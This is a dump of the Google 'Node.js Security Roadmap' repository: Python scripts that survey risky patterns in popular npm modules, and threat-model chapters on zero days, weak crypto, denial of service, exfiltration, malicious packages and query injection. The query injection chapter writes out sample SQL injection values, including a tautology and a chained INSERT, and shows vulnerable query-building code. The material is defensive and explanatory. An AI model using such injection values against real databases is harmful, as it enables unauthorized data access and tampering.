95 | top100 = [x for x in file(top100_txt).read().split('\n') if x]
96 |
97 | externs = set()
98 | for externs_file in py_common.npm.js_files_under(
99 | os.path.join(os.path.dirname(sys.argv[0]), 'externs')):
100 | if os.path.basename(os.path.dirname(externs_file)) == 'tests':
101 | continue
102 | externs.add(externs_file)
103 |
104 | # Maps rule identifiers to sets of offending modules.
105 | rule_violations = {}
106 |
107 |
108 | module_count = 0
109 | for module_name in top100:
110 | violations = run_jsconf(node_modules, module_name, externs)
111 | if ('Parse error.' in violations
112 | or 'Argument list too long' in violations):
113 | pass
114 | else:
115 | module_count += 1
116 | for v in violations:
117 | if v in rule_violations:
118 | vmap = rule_violations[v]
119 | else:
120 | vmap = rule_violations[v] = {}
121 | vmap[module_name] = vmap.get(module_name, 0) + 1
122 |
123 | # TODO: exclude Parse error and Argument list too long
124 |
125 | print "## JS Conformance {#jsconf}"
126 | print ""
127 | print "JS Conformance identifies uses of risky APIs."
128 | print ""
129 | print "Some modules did not parse. This may be dues to typescript."
130 | print "JSCompiler doesn't deal well with mixed JavaScript and TypeScript"
131 | print "inputs."
132 | print ""
133 | print "If a module is both in the top 100 and is a dependency of another"
134 | print "module in the top 100, then it will be multiply counted."
135 | print ""
136 | print "Out of %d modules that parsed" % module_count
137 | print ""
138 | print "| Violation | Count of Modules | Total Count | Quartiles |"
139 | print "| --------- | ---------------- | ----------- | --------- |"
140 | for (v, vmap) in sorted(rule_violations.items()):
141 | count = 0
142 | total_count = 0
143 | values = vmap.values()
144 | for n in values:
145 | count += 1
146 | total_count += n
147 | values += [0] * (module_count - count)
148 | values.sort()
149 | quartiles = '%d / %d / %d' % (
150 | values[len(values) >> 2],
151 | values[len(values) >> 1],
152 | values[(len(values) * 3) >> 2],
153 | )
154 | print "| `%s` | %d | %d | %s |" % (
155 | v, count, total_count, quartiles)
156 |
--------------------------------------------------------------------------------
/appendix/lazy-load/experiment.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/python
2 |
3 | # Copyright 2017 Google LLC
4 | #
5 | # Licensed under the Apache License, Version 2.0 (the "License");
6 | # you may not use this file except in compliance with the License.
7 | # You may obtain a copy of the License at
8 | #
9 | # https://www.apache.org/licenses/LICENSE-2.0
10 | #
11 | # Unless required by applicable law or agreed to in writing, software
12 | # distributed under the License is distributed on an "AS IS" BASIS,
13 | # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
14 | # See the License for the specific language governing permissions and
15 | # limitations under the License.
16 |
17 | """Looks for lazy loading patterns.
18 |
19 | Patterns to identify include
20 |
21 | * { ... require(...)
22 |
23 | """
24 |
25 | import json
26 | import os.path
27 | import py_common.npm
28 | import re
29 | import shutil
30 | import sys
31 |
32 |
33 | lazy_load_pattern = re.compile(
34 | r'[{][^}]*(?>sys.stderr, "Falling back to worst-case for %s required by %s" % (
131 | # up_module_name, module_name)
132 | js_files.update([(up_module_name, src) for src in
133 | js_files_under(
134 | os.path.join(node_modules, up_module_name))
135 | if not probable_non_prod_file(src)])
136 | package_json = None
137 | try:
138 | package_json = json.loads(
139 | file(os.path.join(node_modules, up_module_name, 'package.json'), 'r')
140 | .read())
141 | except:
142 | print >>sys.stderr, "Undeclared dependency %s" % up_module_name
143 | if package_json is not None:
144 | unprocessed += package_json['dependencies'].keys()
145 | return tuple(sorted(js_files))
146 |
147 | def requires(node_modules, module_name):
148 | """
149 | Follows require() calls to bound the set of JS files in a module.
150 |
151 | Returns {
152 | 'srcs': [...], # main.js and same-module files required thereof
153 | 'deps': [...], # required modules
154 | 'upper': True, # True when srcs and deps accounts for all require calls.
155 | }
156 | """
157 | module_root = os.path.join(node_modules, module_name)
158 | package_json = json.loads(
159 | file(os.path.join(module_root, 'package.json')).read())
160 | main_files = package_json.get('main', None)
161 | if type(main_files) in (str, unicode):
162 | main_files = (main_files,)
163 | if not main_files:
164 | return { 'srcs': (), 'deps': (), 'upper': False }
165 | srcs = set()
166 | deps = set()
167 | upper = True
168 | visited = set()
169 | unprocessed = [os.path.join(module_root, rp) for rp in main_files]
170 | while unprocessed:
171 | src = os.path.realpath(unprocessed.pop())
172 | if src in visited: continue
173 | visited.add(src)
174 | if os.path.isdir(src):
175 | for f in js_files_under(src):
176 | unprocessed.append(f)
177 | else:
178 | srcs.add(src)
179 | content = ''
180 | try:
181 | content = file(src, 'r').read()
182 | except:
183 | upper = False
184 | for match in _REQUIRE_RE.finditer(content):
185 | arg = match.group(1).strip()
186 | if not arg:
187 | pass # Zero arguments
188 | elif len(arg) > 2 and arg[0] in ('"', "'") and arg[0] == arg[-1]:
189 | try:
190 | arg = json.loads('"%s"' % arg[1:-1])
191 | except:
192 | #print >>sys.stderr, "Cannot parse require argument %s" % arg
193 | upper = False
194 | if _REL_REQUIRE_RE.match(arg):
195 | if not arg.endswith('.js'): arg += '.js'
196 | unprocessed.append(arg)
197 | else:
198 | deps.add(arg)
199 | else:
200 | upper = False
201 | return {
202 | 'srcs': tuple(sorted(srcs)),
203 | 'deps': tuple(sorted(deps)),
204 | 'upper': upper
205 | }
206 |
207 | def js_files_under(root_dir):
208 | for dir_path, subdir_list, file_list in os.walk(root_dir):
209 | for f in file_list:
210 | if f.endswith('.js') or f.endswith('.ts'):
211 | yield os.path.join(dir_path, f)
212 |
213 | def preprocess_js_content(content):
214 | """
215 | Preprocesses JS content to make it easier to operate on.
216 |
217 | All comments are replaced with spaces, and string literal
218 | content is upper-cased to make it easier to distinguish
219 | lower-case keywords and identifiers from similar content that
220 | appears inside a string literal.
221 | """
222 |
223 | lexer = jslex.jslex.JsLexer()
224 | canon_tokens = []
225 | for (tok_type, tok_content) in lexer.lex(content):
226 | if tok_type in ('comment', 'linecomment'):
227 | tok_content = ' '
228 | elif tok_type in ('regex', 'string'):
229 | tok_content = tok_content.upper()
230 | canon_tokens.append(tok_content)
231 | processed_content = ''.join(canon_tokens)
232 |
233 | return processed_content
234 |
235 | def js_srcs_matching(node_modules, module_name, pattern, module_filter=None):
236 | """
237 | A list of srcs under root_dir whose content
238 | matches pattern.
239 | """
240 |
241 | srcs = js_srcs_almost_worst_case(
242 | node_modules=node_modules,
243 | module_name=module_name,
244 | module_filter=module_filter)
245 |
246 | matching_srcs = []
247 | for src in srcs:
248 | (_, path) = src
249 | canon_content = preprocess_js_content(file(path, 'r').read())
250 | match = pattern.search(canon_content)
251 | if match:
252 | matching_srcs.append(src)
253 | return matching_srcs
254 |
255 | # by visual examination of
256 | # `find node_modules/ -type d | perl -pe 's|/|\n|g' | sort | uniq`
257 | _NON_PROD_PATH = re.compile(
258 | r'(?i)(?:^|[/\\])(?:tests?|testdata|testing|.github|__tests__|demo|examples?|benchmarks?)(?:$|[/\\])')
259 | def probable_non_prod_file(path):
260 | """
261 | Skip probable non test files when falling back to directory scanning.
262 | """
263 | return _NON_PROD_PATH.search(path) is not None
264 |
--------------------------------------------------------------------------------
/appendix/test-code/experiment.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/python
2 |
3 | # Copyright 2017 Google LLC
4 | #
5 | # Licensed under the Apache License, Version 2.0 (the "License");
6 | # you may not use this file except in compliance with the License.
7 | # You may obtain a copy of the License at
8 | #
9 | # https://www.apache.org/licenses/LICENSE-2.0
10 | #
11 | # Unless required by applicable law or agreed to in writing, software
12 | # distributed under the License is distributed on an "AS IS" BASIS,
13 | # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
14 | # See the License for the specific language governing permissions and
15 | # limitations under the License.
16 |
17 | """Looks for test code patterns under node_modules.
18 |
19 | Patterns identify include
20 |
21 | * require('assert')
22 | * require('chai')
23 | * require('chai/*')
24 | * require('mocha')
25 | * require('should')
26 | * require('unexpected')
27 |
28 | """
29 |
30 | import json
31 | import os.path
32 | import py_common.npm
33 | import re
34 | import shutil
35 | import sys
36 |
37 |
38 | test_code_pattern = re.compile(
39 | r'(?m)(?:^|[^.\w])require\s*[(]\s*[\'\"](?:assert|chai|chai/[^\'\"]|mocha|should|unexpected)[\'\"]')
40 |
41 |
42 | if __name__ == '__main__':
43 | (node_modules, separate_modules, top100_txt) = sys.argv[1:]
44 |
45 | top100 = [x for x in file(top100_txt).read().split('\n') if x]
46 |
47 | uses = 0
48 | total_count = 0
49 | has_test_code = {}
50 | for module_name in top100:
51 | module_root = os.path.join(separate_modules, module_name)
52 | for js_file in py_common.npm.js_files_under(module_root):
53 | js_content = file(js_file, 'r').read()
54 | if test_code_pattern.search(js_content):
55 | uses += 1
56 | break
57 | total_count += 1
58 |
59 | print (
60 | """
61 | ## Prod bundle includes test code {#test_code}
62 |
63 | Some of the top 100 modules are test code, e.g. mocha, chai.
64 | This measures which modules, when installed `--only=prod` include
65 | test patterns.
66 |
67 | %d of %d = %1.02f%% contain test code patterns
68 | """ % (uses, total_count, (100.0 * uses) / total_count))
69 |
--------------------------------------------------------------------------------
/appendix/top100.txt:
--------------------------------------------------------------------------------
1 | async
2 | babel-core
3 | babel-preset-es2015
4 | babel-runtime
5 | bluebird
6 | body-parser
7 | chalk
8 | cheerio
9 | classnames
10 | coffee-script
11 | colors
12 | commander
13 | debug
14 | express
15 | fs-extra
16 | glob
17 | gulp
18 | gulp-util
19 | jquery
20 | lodash
21 | minimist
22 | mkdirp
23 | moment
24 | prop-types
25 | q
26 | react
27 | react-dom
28 | request
29 | rxjs
30 | through2
31 | underscore
32 | uuid
33 | webpack
34 | winston
35 | yargs
36 | yeoman-generator
37 | @angular/common
38 | @angular/core
39 | aws-sdk
40 | axios
41 | babel-loader
42 | babel-polyfill
43 | chai
44 | co
45 | core-js
46 | css-loader
47 | ejs
48 | ember-cli-babel
49 | eslint
50 | handlebars
51 | inquirer
52 | joi
53 | js-yaml
54 | mocha
55 | mongodb
56 | mongoose
57 | node-uuid
58 | object-assign
59 | optimist
60 | ramda
61 | react-redux
62 | redis
63 | redux
64 | request-promise
65 | rimraf
66 | semver
67 | shelljs
68 | socket.io
69 | superagent
70 | xml2js
71 | yosay
72 | zone.js
73 | @angular/compiler
74 | @angular/forms
75 | @angular/http
76 | @angular/platform-browser
77 | @angular/platform-browser-dynamic
78 | @types/node
79 | angular
80 | autoprefixer
81 | babel-eslint
82 | babel-preset-react
83 | bootstrap
84 | cookie-parser
85 | dotenv
86 | es6-promise
87 | eslint-plugin-react
88 | extend
89 | extract-text-webpack-plugin
90 | file-loader
91 | immutable
92 | jade
93 | jsonwebtoken
94 | marked
95 | mime
96 | morgan
97 | mysql
98 | nan
99 | node-sass
100 | path
101 | promise
102 | react-router
103 | style-loader
104 | typescript
105 | uglify-js
106 | underscore.string
107 | vue
108 | ws
109 |
--------------------------------------------------------------------------------
/appendix/uses-scripts/experiment.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/python
2 |
3 | # Copyright 2017 Google LLC
4 | #
5 | # Licensed under the Apache License, Version 2.0 (the "License");
6 | # you may not use this file except in compliance with the License.
7 | # You may obtain a copy of the License at
8 | #
9 | # https://www.apache.org/licenses/LICENSE-2.0
10 | #
11 | # Unless required by applicable law or agreed to in writing, software
12 | # distributed under the License is distributed on an "AS IS" BASIS,
13 | # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
14 | # See the License for the specific language governing permissions and
15 | # limitations under the License.
16 |
17 | """Collates how many projects use install scripts.
18 |
19 | Per https://docs.npmjs.com/misc/scripts we look for the
20 | following keys under "scripts" in package.json:
21 |
22 | * preinstall
23 | * install
24 | * postinstall
25 | """
26 |
27 | import json
28 | import os.path
29 | import py_common.npm
30 | import sys
31 |
32 | def uses_scripts(package_root):
33 | package_json = json.loads(
34 | file(os.path.join(package_root, 'package.json')).read())
35 | scripts_obj = package_json.get('scripts', None)
36 | if scripts_obj is None:
37 | return False
38 | for script_type in ('preinstall', 'install', 'postinstall'):
39 | # TODO: True if empty value
40 | if script_type in scripts_obj: return True
41 | return False
42 |
43 | if __name__ == '__main__':
44 | (node_modules, separate_modules, top100_txt) = sys.argv[1:]
45 |
46 | per_package = py_common.npm.for_each_npm_package(
47 | node_modules, uses_scripts)
48 | total_count = 0
49 | uses_scripts = 0
50 | for uses in per_package.itervalues():
51 | if uses:
52 | uses_scripts += 1
53 | total_count += 1
54 | print (
55 | """
56 | ## Uses Scripts {#uses_scripts}
57 |
58 | Unless steps are taken, installation scripts run code on
59 | a developer's workstation when they have write access to
60 | local repositories. If this number is small, having
61 | humans check installation scripts before running might
62 | be feasible.
63 |
64 | %d of %d = %1.02f%% use installation scripts
65 | """ % (uses_scripts, total_count, (100.0 * uses_scripts) / total_count))
66 |
--------------------------------------------------------------------------------
/book.json.withcomments:
--------------------------------------------------------------------------------
1 | # Comments are stripped
2 | {
3 | "root": ".",
4 | "structure": {
5 | "readme": "cover.md"
6 | },
7 | "title": "A Roadmap for Node.js Security",
8 | "description": "Discusses security and privacy threats to the Node.js community and ways the community might address them. Assumes a basic familiarity with JS & the Node ecosystem.",
9 | "author": "Mike Samuel et al",
10 | "language": "en",
11 | "gitbook": ">= 3.0.0",
12 | "plugins": [
13 | "links",
14 | "ga"
15 | ],
16 | "pluginsConfig": {
17 | # Google Analytics integration
18 | "ga": {
19 | "token": "UA-111883728-1",
20 | "configuration": {
21 | "anonymizeIp": true,
22 | "forceSSL": true
23 | }
24 | },
25 | "links": {
26 | "links": [
27 | {
28 | # Adds a printer icon at the top.
29 | # See styles/website.css for styling.
30 | "label": "Printable",
31 | # "icon" corresponds to a classname
32 | "icon": "print-button",
33 | # `make pdf` produces book.json which
34 | # needs to be copied into _book/ for
35 | # this to work.
36 | # TODO: Point to an authoritative version
37 | # via absolute URL once published.
38 | "url": "/node-sec-roadmap.pdf"
39 | },
40 | {
41 | "label": "Github",
42 | "icon": "github-button",
43 | "url": "https://github.com/google/node-sec-roadmap"
44 | }
45 | ]
46 | }
47 | }
48 | }
49 |
--------------------------------------------------------------------------------
/chapter-1/recap.md:
--------------------------------------------------------------------------------
1 | We've discussed the kinds of threats that concern us.
2 |
3 | Next we discuss how some Node.js projects mitigate these threats today
4 | and how we can make it easier for more Node.js projects to
5 | consistently mitigate these threats.
6 |
7 | Readers may find it useful to refer back to the [threat table][] which
8 | cross-indexes threats and mitigation strategies.
9 |
10 | [threat table]: threats.md#threat_table
11 |
--------------------------------------------------------------------------------
/chapter-1/threat-0DY.md:
--------------------------------------------------------------------------------
1 | # Zero Day
2 |
3 | When a researcher discloses a new security vulnerability, the clock
4 | starts ticking. An attacker can compromise a product if they can
5 | weaponize the disclosure before the product team
6 |
7 | * realizes they're vulnerable, and
8 | * finds a patch to the vulnerable dependency, or rolls their own, and
9 | * tests the patched release and pushes it into production.
10 |
11 | ["The Best Defenses Against Zero-day Exploits for Various-sized
12 | Organizations"][sans] notes
13 |
14 | > Zero-day exploits are vulnerabilities that have yet to be publicly
15 | > disclosed. These exploits are usually the most difficult to defend
16 | > against because data is generally only available for analysis after
17 | > the attack has completed its course.
18 |
19 | > ...
20 |
21 | > The research community has broadly classified the defense techniques
22 | > against zero-day exploits as statistical-based, signature-based,
23 | > behavior-based, and hybrid techniques (Kaur & Singh, 2014). The
24 | > primary goal of each of these techniques is to identify the exploit in
25 | > real time or as close to real time as possible and quarantine the
26 | > specific attack to eliminate or minimize the damage caused by the
27 | > attack.
28 |
29 | Being able to respond quickly to limit damage and recover are
30 | critical.
31 |
32 | That same paper talks at length about *worms*: programs that
33 | compromise a system without explicit direction by a human attacker,
34 | and use the compromise of one system to find other systems to
35 | automatically compromise.
36 |
37 | Researchers have found ways ([details][saccone]) that worms
38 | might propagate throughout `registry.npmjs.org` and common practices
39 | that might allow a compromise to jump from the module repository to
40 | large numbers of production servers.
41 |
42 | If we can structure systems so that compromising one component
43 | does not make it easier to compromise another component, then
44 | we can contain damage due to worms.
45 |
46 | If, in a population of components, we can keep susceptibility below a
47 | critical threshold so that worms spend more time searching for targets
48 | than compromising targets, then we can buy time for humans to
49 | understand and respond.
50 |
51 | If we prevent compromise of a population of modules by a zero day
52 | from causing widespread compromise of a population of production
53 | servers then we can limit damage to end users.
54 |
55 | [sans]: https://www.sans.org/reading-room/whitepapers/bestprac/defenses-zero-day-exploits-various-sized-organizations-35562
56 | [saccone]: https://www.kb.cert.org/CERT_WEB/services/vul-notes.nsf/6eacfaeab94596f5852569290066a50b/018dbb99def6980185257f820013f175/$FILE/npmwormdisclosure.pdf
57 |
--------------------------------------------------------------------------------
/chapter-1/threat-BOF.md:
--------------------------------------------------------------------------------
1 | # Buffer Overflow
2 |
3 | A buffer overflow occurs when code fails to check an index into an
4 | array while unpacking input, allowing parts of that input to overwrite
5 | memory locations that other trusted code assumes are inviolable.
6 | A similar technique also allows exfiltrating data like cryptographic keys
7 | when an unchecked limit leads to copying unintended memory locations into
8 | an output.
9 |
10 | Buffer overflow vectors in Node.js are:
11 |
12 | * The Node.js runtime and dependencies like the JS runtime and OpenSSL
13 | * [C++ addons][] third-party modules that use N-API (the native API).
14 | * Child processes. For example, code may route a request body to an
15 | [image processing library][imagetragick] that was not
16 | written with untrusted inputs in mind.
17 |
18 | Buffer overflows are common, but we class them as low frequency for
19 | Node.js in particular. The runtime is highly reviewed compared to the
20 | average C++ backend; C++ addons are a small subset of third-party
21 | modules; and there's no reason to believe that child processes spawned
22 | by Node.js applications are especially risky.
23 |
24 | [imagetragick]: https://imagetragick.com/
25 | [C++ addons]: https://nodejs.org/api/addons.html#addons_c_addons
26 |
--------------------------------------------------------------------------------
/chapter-1/threat-CRY.md:
--------------------------------------------------------------------------------
1 | # Weak Crypto {#CRY}
2 |
3 | Cryptographic primitives are often the only practical way to solve
4 | important classes of problems, but it's easy to make mistakes when using
5 | `crypto.*` APIs.
6 | Failing to identify third-party modules that use crypto (or should be
7 | using crypto) and determining whether they are using it properly can lead
8 | to a false sense of security.
9 |
10 | ["Developer-Resistant Cryptography"][Cairns & Steel] by Cairns & Steel
11 | notes:
12 |
13 | > The field of cryptography is inherently difficult. Cryptographic API
14 | > development involves narrowing a large, complex field into a small set
15 | > of usable functions. Unfortunately, these APIs are often far from
16 | > simple.
17 |
18 | > ...
19 |
20 | > In 2013, study by Egele et al. revealed even more startling figures
21 | > [1]. In this study, six rules were defined which, if broken, indicated
22 | > the use of insecure protocols. More than 88% of the 11,000 apps
23 | > analyzed broke at least one rule. Of the rule-breaking apps, most
24 | > would break not just one, but multiple rules. Some of these errors
25 | > were attributed to negligence, for example test code included in
26 | > release versions. However, in most cases it appears developers
27 | > unknowingly created insecure apps.
28 |
29 | > ...
30 |
31 | > The human aspect can be improved through better education for
32 | > developers. Sadly, this approach is unlikely to be a complete
33 | > solution. It is unreasonable to expect a developer to be a security
34 | > expert when most of their time is spent on other aspects of software
35 | > design.
36 |
37 | Code that uses cryptography badly can seem like it's working as intended
38 | until an attacker unravels it.
39 | Testing code that uses cryptographic APIs is hard. It's hard to write
40 | a unit test to check that a skilled cryptographer can't efficiently
41 | extract information from a random looking string or compute a random
42 | looking string that passes a verifier.
43 |
44 | Weak cryptography can also mask other problems. For example, a
45 | security auditor might try to check for leaks of email addresses by
46 | creating a dummy account `Carol ` and
47 | check for the string `carol@example.com` in data served in responses,
48 | while recursing into substrings encoded using base64, gzip, or other
49 | common encodings.
50 | If some of that data is poorly encrypted, then the auditor might
51 | falsely conclude that an attacker who can't break strong
52 | encryption does not have access to emails.
53 |
54 | [Cairns & Steel]: https://www.w3.org/2014/strint/papers/48.pdf
55 |
--------------------------------------------------------------------------------
/chapter-1/threat-DEX.md:
--------------------------------------------------------------------------------
1 | # Poor Developer Experience
2 |
3 | Security specialists have a vested interest in keeping developers
4 | happy & productive.
5 |
6 | Developer experience is not only a business or usability threat. When
7 | a team is less agile, it cannot respond as effectively to security
8 | threats, or roll out interfaces that let end users manage their own
9 | security and privacy.
10 |
11 | Application developers may miss deadlines, cut features, or
12 | compromise maintainability if any of the following are true:
13 |
14 | * starting a new project takes too long
15 | * they often cannot make progress until they get feedback from
16 | security specialists (or other specialists like I18N, Legal, UI)
17 | * repeated tasks are slow:
18 | * restarting an application or service,
19 | * running `npm install`, or
20 | * rerunning tests after small changes
21 | * getting approval for a pull request takes long enough that
22 | upstream has to be manually merged into the branch.
23 | * breaking common code out of an application into an npm
24 | module becomes hard, so it is easier to copy-paste from one
25 | application to another
26 | * a developer has to spend significant time getting a release
27 | candidate approved instead of working on the next iteration.
28 |
--------------------------------------------------------------------------------
/chapter-1/threat-DOS.md:
--------------------------------------------------------------------------------
1 |
2 | # Denial of Service
3 |
4 | Denial of service occurs when a well-behaved, authorized user cannot
5 | access a system because of misbehavior by another.
6 |
7 | "Denial of service" is most often associated with [flooding][] a
8 | network endpoint so it cannot respond to the smaller number of
9 | legitimate requests, but there are other vectors:
10 |
11 | * Causing the server to use up [a finite resource][res-exh]
12 | like file descriptors causing threads to block.
13 | * Causing the target to issue a network request to an endpoint the
14 | attacker controls and responding slowly.
15 | * Causing the target to store malformed data which triggers an error
16 | in code that unpacks the stored data and causes a server to provide
17 | an error response to a well-formed request.
18 | * Exploiting event dispatch bugs to cause starvation
19 | ([example][disclosure]).
20 | * Supplying over-large inputs to super-linear (> O(n)) algorithms.
21 | For example supplying a crafted string to an ambiguous `RegExp`
22 | to cause [excessive backtracking][].
23 |
24 | Denial of service attacks that exploit the network layer are usually
25 | handled in the reverse proxy and we find no reason to suppose that
26 | node applications are especially vulnerable to other kinds of denial
27 | of service.
28 |
29 | ## Additional risk: Integrity depends on quick completion
30 |
31 | A system requires [atomicity][] when two or more effects have to
32 | happen together or not at all. Databases put a lot of engineering
33 | effort into ensuring atomicity.
34 |
35 | Sometimes, ad-hoc code seems to preserve atomicity when tested under
36 | low-load conditions:
37 |
38 | ```js
39 | // foo() and bar() need to happen together or not at all.
40 | foo(x);
41 | // Not much of a gap here under normal conditions for another part
42 | // of the system to observe foo() but not bar().
43 | try {
44 | bar(x);
45 | } catch (e) {
46 | undoFoo();
47 | throw e;
48 | }
49 | ```
50 |
51 | This code, though buggy, may be highly reliable under normal
52 | conditions, but may fail under load, or if an attacker can cause
53 | `bar()` to run for a while before its side-effect happens, for example
54 | by causing excessive backtracking in a regular expression used to
55 | check a precondition.
56 |
57 | Some of the same techniques which makes a system unavailable can
58 | widen the window of vulnerability within which an attacker can exploit
59 | an atomicity failure.
60 |
61 | Client-side, runaway computations rarely escalate into an integrity
62 | violation since atomicity requirements are typically maintained on the
63 | server. Server-side, we expect that this problem would be more
64 | common.
65 |
66 | [flooding]: https://capec.mitre.org/data/definitions/125.html
67 | [excessive backtracking]: https://www.regular-expressions.info/catastrophic.html
68 | [res-exh]: https://capec.mitre.org/data/definitions/131.html
69 | [disclosure]: https://sandstorm.io/news/2015-04-08-osx-security-bug
70 | [atomicity]: https://en.wikipedia.org/wiki/ACID#Atomicity
71 |
--------------------------------------------------------------------------------
/chapter-1/threat-EXF.md:
--------------------------------------------------------------------------------
1 | # Exfiltration of Data
2 |
3 | "Exfiltration" happens when an attacker causes a response to include
4 | data that it should not have. Web applications and services may
5 | produce response bodies that include too much information.
6 |
7 | This can happen when server-side JavaScript has access to more
8 | data than it needs to do its job and either
9 |
10 | * it serializes unintended information and no one notices or
11 | * an attacker controls what is serialized.
12 |
13 | Consider
14 |
15 | ```js
16 | Object.assign(output, this[str]);
17 | ```
18 |
19 | If the attacker controls `str` then they may be able to pick any field
20 | of `this` or possibly any global field.
21 |
22 | This problem is not new to Node.js but we consider this higher
23 | frequency for Node.js for these reasons:
24 |
25 | * There is no equivalent to `Object.assign` in most backend languages.
26 | It's possible in Python and Java via reflective operators but
27 | security auditors can narrow down code that might suffer this vulnerability
28 | to those that use reflection.
29 | `Object.assign`, `$.extend` and similar operators are widely used in
30 | idiomatic JavaScript.
31 | * In most backend languages, `obj[...]` does not allow aliasing of all
32 | properties.
33 | For example, Python allows `obj[...]` on types that implement `__getitem__`
34 | which is not the case for user-defined classes.
35 | Java has generic collections and maps, but for user-defined classes
36 | the equivalent code pattern requires reflection and possibly calls to
37 | `setAccessible(true)`.
38 |
39 | JavaScript makes it easier to alias properties and methods and common
40 | JavaScript idioms make it harder for security auditors to narrow down
41 | code that might inadvertently allow exfiltration.
42 |
43 | `Object.assign` and related copy operators are also potential
44 | [mass assignment][] vectors as in:
45 |
46 | ```js
47 | Object.assign(systemData, JSON.parse(untrustedInput))
48 | ```
49 |
50 | [mass assignment]: https://en.wikipedia.org/wiki/Mass_assignment_vulnerability
51 |
--------------------------------------------------------------------------------
/chapter-1/threat-LQC.md:
--------------------------------------------------------------------------------
1 | # Low Quality Code
2 |
3 | An application or service is vulnerable when its security depends on a
4 | module upholding a contract that it does not uphold.
5 |
6 | Most new software has bugs when first released. Over time, maintainers
7 | fix the bugs that have obvious, bad consequences.
8 |
9 | Often, widely used software has problem areas that are well understood.
10 | Developers can make a pragmatic decision to use it while taking
11 | additional measures to make sure those problems don't compromise
12 | security guarantees.
13 |
14 | Orphaned code that has not been updated recently may have done a
15 | good job of enforcing its contract, but attackers may have discovered
16 | new tricks, or the threat environment may have changed so it may
17 | no longer enforce its contract in the face of an attack.
18 |
19 | Low quality code constitutes a threat when developers pick a module
20 | without understanding the caveats to the contract it actually
21 | provides, or without taking additional measures to limit damage when
22 | it fails.
23 |
24 | It may be the case that there's higher risk of poorly understood
25 | contracts when a community is experimenting rapidly as is the case for
26 | Node.js, or early on before the community has settled on clear winners
27 | for core functions, but we consider the frequency of vulnerabilities
28 | due to low quality code in the npm repository roughly the same as for
29 | other public module repositories.
30 |
--------------------------------------------------------------------------------
/chapter-1/threat-MTP.md:
--------------------------------------------------------------------------------
1 | # Malicious Third-Party Code
2 |
3 | Most open-source developers work in good faith to provide useful tools
4 | to the larger community of developers but
5 |
6 | * Passwords are easy to guess, so attackers can suborn accounts that
7 | are only protected by a password. On GitHub, developers may
8 | configure their accounts to require a
9 | [second factor][github-second-factor] but this is not yet the norm.
10 | * Pull requests that aren't thoroughly reviewed may dilute security
11 | properties.
12 | * Phishing requests targeted at GitHub users ([details][dimnie]) can
13 | execute code on unwary committers' machines.
14 | * A pull request may appear to come from a higher-reputation source
15 | ([details][unsigned commits]).
16 |
17 | Malicious code can appear in the server-side JavaScript running in
18 | production, or can take the form of install hooks that run on a
19 | developer workstation with access to local repositories and to
20 | writable elements of `$PATH`.
21 |
22 | Projects that deploy the latest version of a dependency straight to
23 | production are more vulnerable to malicious code. If an attacker
24 | manages to publish a version with malicious code which is quickly
25 | discovered, it affects projects that deploy during that short "window
26 | of vulnerability." Projects that `npm install` the latest version
27 | straight to production are more likely to fall in that window than
28 | projects that cherrypick versions or that shrinkwrap to make sure that
29 | their development versions match deployed versions.
30 |
31 | [Bower is deprecated][bower-depr] so our discussions focus on
32 | `npmjs.org`, but it's worth noting that Bower has a single-point of
33 | failure. Anyone who can create a release branch can commit and
34 | publish a new version.
35 |
36 | [`npm profile`][npm profile] allows requiring
37 | [two factor auth][npm auth-and-writes] for publishing and privilege
38 | changes. If the npm accounts that can publish new versions of a
39 | package only checkout code from a GitHub account all of whose
40 | committers use two factors, then there is no single password that can
41 | compromise the system.
42 |
43 | The frequency of malicious code vulnerabilities affecting Node.js is
44 | probably roughly the same as that for other public module repositories.
45 | The npm repo has been a target in the past [1][getcookies-disclosure]
46 | [2][crossenv-typosquat-disclosure].
47 |
48 | The [npm Blog][crossenv-typosquat-disclosure] explains what to do if
49 | you believe you have found malicious code:
50 |
51 | > On August 1, a user notified us via Twitter that a package with a
52 | > name very similar to the popular `cross-env` package was sending
53 | > environment variables from its installation context out to
54 | > npm.hacktask.net. We investigated this report immediately and took
55 | > action to remove the package. Further investigation led us to remove
56 | > about 40 packages in total.
57 | >
58 | > ...
59 | >
60 | > Please do reach out to us immediately if you find malware on the
61 | > registry. The best way to do so is by sending email to
62 | > [security@npmjs.com](mailto:security@npmjs.com). We will act to
63 | > clean up the problem and find related problems if we can.
64 |
65 |
66 | [github-second-factor]: https://help.github.com/articles/about-two-factor-authentication/
67 | [bower-depr]: https://bower.io/blog/2017/how-to-migrate-away-from-bower/
68 | [dimnie]: https://researchcenter.paloaltonetworks.com/2017/03/unit42-dimnie-hiding-plain-sight/
69 | [unsigned commits]: https://nvisium.com/resources/blog/2017/06/21/securing-github-commits-with-gpg-signing.html
70 | [npm profile]: https://docs.npmjs.com/cli/profile
71 | [saccone]: https://www.kb.cert.org/CERT_WEB/services/vul-notes.nsf/6eacfaeab94596f5852569290066a50b/018dbb99def6980185257f820013f175/$FILE/npmwormdisclosure.pdf
72 | [npm auth-and-writes]: https://docs.npmjs.com/getting-started/using-two-factor-authentication
73 | [getcookies-disclosure]: https://blog.npmjs.org/post/173526807575/reported-malicious-module-getcookies
74 | [crossenv-typosquat-disclosure]: http://blog.npmjs.org/post/163723642530/crossenv-malware-on-the-npm-registry
75 |
--------------------------------------------------------------------------------
/chapter-1/threat-QUI.md:
--------------------------------------------------------------------------------
1 | # Query Injection
2 |
3 | [Query injection][] occurs when an attacker causes a query sent to a
4 | database or other backend to have a [structure][spp] that differs from
5 | that the developer intended.
6 |
7 | ```js
8 | connection.query(
9 | 'SELECT * FROM Table WHERE key="' + value + '"',
10 | callback);
11 | ```
12 |
13 | If an attacker controls `value` and can cause it to contain a single
14 | quote, then they can cause execution of a query with a different structure.
15 | For example, if they can cause
16 |
17 | ```js
18 | value = ' " OR 1 -- two dashes start a line comment';
19 | ```
20 |
21 | then the query sent is `SELECT * FROM Table WHERE key=" " OR 1 -- ...`
22 | which returns more rows than intended possibly [leaking](./threat-EXF.md)
23 | data that the requester should not have been able to access, and may
24 | cause other code that loops over the result set to modify rows other than
25 | the ones the system's authors intended.
26 |
27 | Some backends allow statement chaining so compromising a statement
28 | that seems to only read data:
29 |
30 | ```js
31 | value = '"; INSERT INTO Table ... --'
32 | ```
33 |
